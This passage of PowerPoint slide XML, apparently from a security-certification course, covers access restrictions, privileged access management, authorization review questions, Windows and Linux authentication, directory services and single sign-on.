            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Issuing Hardware and Software Assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Teaching Policy Awareness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Creating Permissions Assignment</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6673094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F0AB8-1517-A237-3BE6-B6B6DF7E2225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>Account Attributes and Access Policies</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="4400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 275">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{312A0103-7389-4255-E4A5-276757E639C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306286" y="1901371"/>
            <a:ext cx="8959923" cy="4688115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13877033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5DE7D-3E96-29E4-A99E-11FE0749247B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Account Restrictions</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{902F4AF6-AC8C-9A37-D791-7738FC8B8F01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024128" y="1799771"/>
            <a:ext cx="10224443" cy="4789715"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Policy-based restrictions can be used to mitigate some risks of account compromise through the theft of credentials.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Location-Based Policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173736" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The geographical location of a user or device can be calculated using a geolocation mechanism:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="459486" lvl="1" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="459486" lvl="1" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Location services</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Time-Based Restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173736" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are four main types of time-based policies:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="459486" lvl="1" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A time-of-day restrictions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="459486" lvl="1" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A duration-based login policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="459486" lvl="1" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>An impossible travel time/risky login policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="459486" lvl="1" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A temporary permissions policy </a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28217795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F136-0DB3-8C7C-08C2-03DBEE977DF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Privileged Access Management (PAM)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4B0CEE5-6053-B983-EC68-586E5ECBB79B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>There are three main models for implementing this:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Temporary Elevation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Password Vaulting/Brokering</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Ephemeral Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20495808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719DF-226A-B4C9-D366-0EDC3D8CF3DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Authorization</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0867940-B12E-A96F-2E38-8BF1209C6C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>What is the difference between security group- and role-based permissions management?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>In a rule-based access control model, can a subject negotiate with the data owner for access privileges? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>What is the process of ensuring accounts are only created for valid users, only assigned the appropriate privileges, and that the account credentials are known only to the valid user?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>What is the policy that states users should be allocated the minimum sufficient permissions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>A threat actor was able to compromise the account of a user whose employment had been terminated a week earlier. They used this account to access a network share and exfiltrate important files. What account vulnerability enabled this attack?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="975749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DD22B-61AE-AE61-049E-F0D5CC78A18B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TOPIC 1B – SECURITY CONTROL</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E35E2D1-8C96-6BFB-F194-09707D748BE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766425" y="1670844"/>
            <a:ext cx="7519835" cy="4780756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30692009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186D-26C2-90A9-B8DB-ABE2D9EF7869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 4C - Identity Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{111F996D-45C6-65EE-04B4-63C4096CF79D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10041845" cy="4205514"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>While an on-premises network can use a local directory to manage accounts and rights, as organizations move services to the cloud, these authorizations have to be implemented using federated identity management solutions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Local, Network, and Remote Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the most important features of an operating system is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>authentication provider, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which is the software architecture and code that underpins the mechanism by which the user is authenticated before starting a shell.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Knowledge-based authentication relies on cryptographic hashes. A plaintext password is not usually transmitted or stored in a credential database because of the risk of compromise. Instead, the password is stored as a cryptographic hash. When a user enters a password to log in, an authenticator converts what is typed into a hash and transmits that to an authority. The authority compares the submitted hash to the one in the database and authenticates the subject only if they match.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26496054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742EA-2FEC-1481-AFA5-87FF073E1A73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="4821161"/>
            <a:ext cx="10404702" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Local, Network, and Remote Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D8D8A3-C90A-AF3F-8782-70C31624B5D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10680475" cy="4597400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Windows Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows authentication involves a complex architecture of components (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>docs.microsoft.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), but the following three scenarios are typical:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Windows local sign-in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Windows network sign-in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remote sign-in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Linux Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Linux, local user account names are stored in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd. When a user logs in to a local interactive shell, the password is checked against a hash stored in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/shadow. Interactive login over a network is typically accomplished using Secure Shell (SSH). With SSH, the user can be authenticated using cryptographic keys instead of a password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1013085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5CAD-D23E-D95D-16BE-34B5CB214167}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Directory Services</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 295">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F20B27-3485-546A-BBF9-AF52C3C3EA06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="304799"/>
            <a:ext cx="9546737" cy="4499429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14600590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98395-E2AC-26F4-2B9F-C27BB6074B0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Single Sign-on Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 296">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADD28DBA-CBB0-DE39-146F-728AFC0B99A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="319314"/>
            <a:ext cx="9954759" cy="4342932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19235771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57094-04D9-791C-8BB7-6408315A8FFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Single Sign-on Authorization</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 298">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C39831A-E3DD-A153-705E-A3E2B3521D52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
